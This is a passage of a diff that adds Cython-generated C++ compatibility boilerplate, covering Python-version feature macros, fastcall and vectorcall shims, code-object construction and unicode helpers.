CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && 